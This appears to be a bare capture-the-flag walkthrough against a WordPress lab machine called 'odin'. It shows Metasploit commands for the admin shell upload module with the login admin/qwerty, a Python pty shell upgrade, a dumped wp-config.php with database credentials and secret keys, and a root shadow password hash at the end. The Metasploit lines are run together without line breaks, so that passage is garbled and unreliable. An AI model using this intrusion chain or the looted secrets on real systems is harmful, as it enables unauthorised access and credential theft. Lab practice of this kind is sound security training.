CTF之“奥丁喝水”

msfconsoleuse exploit/unix/webapp/wp_admin_shell_uploadset RHOSTS odinset username adminset password qwertyrunshell

python3 -c "import pty;pty.spawn('/bin/bash')"

<?php/** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */

// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define( 'DB_NAME', 'joomla' );

/** MySQL database username */define( 'DB_USER', 'joomla' );

/** MySQL database password */define( 'DB_PASSWORD', 'joomla' );

/** MySQL hostname */define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */define( 'DB_COLLATE', '' );

/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */define( 'AUTH_KEY',         'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );define( 'SECURE_AUTH_KEY',  '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );define( 'LOGGED_IN_KEY',    'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );define( 'NONCE_KEY',        '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );define( 'AUTH_SALT',        '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' );define( 'LOGGED_IN_SALT',   '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );define( 'NONCE_SALT',       'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' );

/**#@-*/

/** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */$table_prefix = 'wp_';

/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */if ( ! defined( 'ABSPATH' ) ) {        define( 'ABSPATH', __DIR__ . '/' );}

/** Sets up WordPress vars and included files. */require_once ABSPATH . 'wp-settings.php';

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/